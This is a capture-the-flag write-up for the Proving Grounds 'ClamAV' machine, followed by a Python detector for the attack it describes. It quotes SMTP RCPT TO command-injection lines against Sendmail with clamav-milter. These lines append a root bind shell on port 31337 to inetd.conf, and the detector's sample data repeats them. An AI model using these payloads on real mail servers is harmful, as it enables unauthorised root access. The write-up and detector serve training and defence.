Zeyu's OSCP Writeups
ClamAV

Writeup for ClamAV from Offensive Security Proving Grounds (PG)


Last updated 3 years ago


Information Gathering

Service Enumeration

nmapAutomator.sh -H 192.168.66.42 -t full

nmapAutomator.sh -H 192.168.66.42 -t vulns

HTTP (80)

There is a page with a binary message.

Challenge accepted!

SMTP (25)

We can see that Sendmail 8.13.4 is used.

Exploitation

We find the following Sendmail + ClamAV RCE exploit:

The two lines in the Perl script:

print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";

append an inetd service entry that serves /bin/sh as root on port 31337, then restart inetd so the new entry takes effect, which opens a root bind shell on that port.

After running the script, the port is indeed open.

Upon connecting to the bind shell, use bash -i to upgrade to a fully interactive shell.
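The exploit above works because the milter hands a quoted recipient local part containing a pipe to the mail system as a program to run, and its payload persists as an extra line in /etc/inetd.conf. Both sides of that are easy to spot after the fact. The following is an added example written for this writeup, not code from the page or from the Exploit Database entry: it flags SMTP envelope recipients whose quoted local part carries shell metacharacters, and audits an inetd.conf for services backed by an interactive shell or named by a raw port number. The recipient strings and the inetd.conf text are constructed samples (two of them mirror the lines quoted above), and the function names are my own.

```python
import re

# Shell binaries that should never be the server program of an inetd service.
SHELL_BINARIES = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/ksh", "/bin/zsh"}

# Characters that have no business inside a mailbox name but drive a shell.
SHELL_META = re.compile(r"[|;`$><]")

# Constructed sample: envelope recipients as a milter or a mail log would show
# them. Entries 2 and 3 mirror the two RCPT TO lines from the Perl exploit.
SAMPLE_RCPTS = [
    "<alice@example.com>",
    "<bob+newsletter@example.com>",
    "<nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>",
    "<nobody+\"|/etc/init.d/inetd restart\"@localhost>",
    "<\"john doe\"@example.com>",
]

# Constructed /etc/inetd.conf: two ordinary tcpd-wrapped services plus the
# line the exploit appends.
SAMPLE_INETD_CONF = """\
# constructed inetd.conf sample
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
31337 stream tcp nowait root /bin/sh -i
"""


def local_part(addr: str) -> str:
    """Strip angle brackets and return everything before the last '@'.

    The split is on the last '@' because an injected local part may itself
    contain '>' or '@', which would confuse a naive regex.
    """
    addr = addr.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    return addr.rsplit("@", 1)[0]


def suspicious_rcpt(addr: str) -> list:
    """Return the reasons an envelope recipient looks like command injection.

    An empty list means the address looks like a normal mailbox.
    """
    local = local_part(addr)
    reasons = []
    # A quoted local part is legal RFC 5321 syntax; one that also carries
    # shell metacharacters is the signature of the clamav-milter abuse.
    if '"' in local and SHELL_META.search(local):
        reasons.append("quoted local part contains shell metacharacters")
    # A leading pipe asks the MDA to deliver to a program instead of a mailbox.
    if local.startswith("|") or '"|' in local:
        reasons.append("local part begins with a pipe (program delivery)")
    if "/etc/" in local or "/bin/" in local:
        reasons.append("local part references a system path")
    return reasons


def scan_rcpts(rcpts: list) -> dict:
    """Map each flagged recipient to its list of reasons."""
    return {r: suspicious_rcpt(r) for r in rcpts if suspicious_rcpt(r)}


def audit_inetd_conf(text: str) -> list:
    """Flag inetd.conf entries that hand a socket straight to a shell.

    Fields are: service socket_type protocol wait/nowait user program [args].
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed entry; inetd would reject it too
        service, _sock, _proto, _wait, user, program = fields[:6]
        reasons = []
        if program in SHELL_BINARIES:
            reasons.append(f"server program {program} is an interactive shell")
        if service.isdigit():
            reasons.append("service given as a raw port number rather than a name")
        if reasons:
            findings.append({"line": lineno, "service": service,
                             "user": user, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for addr, why in scan_rcpts(SAMPLE_RCPTS).items():
        print("RCPT", addr, "->", "; ".join(why))
    for f in audit_inetd_conf(SAMPLE_INETD_CONF):
        print("inetd.conf line", f["line"], f["service"], f["user"], "->", "; ".join(f["reasons"]))
```

Run against a real mail log you would feed the RCPT TO values into scan_rcpts; run against a real host you would read /etc/inetd.conf (and /etc/inetd.d/* where present) into audit_inetd_conf. The recipient check keys on the quoted-local-part-plus-metacharacter combination rather than on the literal strings from the exploit, so a reworded payload is still caught, while ordinary quoted mailboxes such as "john doe"@example.com pass.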

Reference: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution (Exploit Database)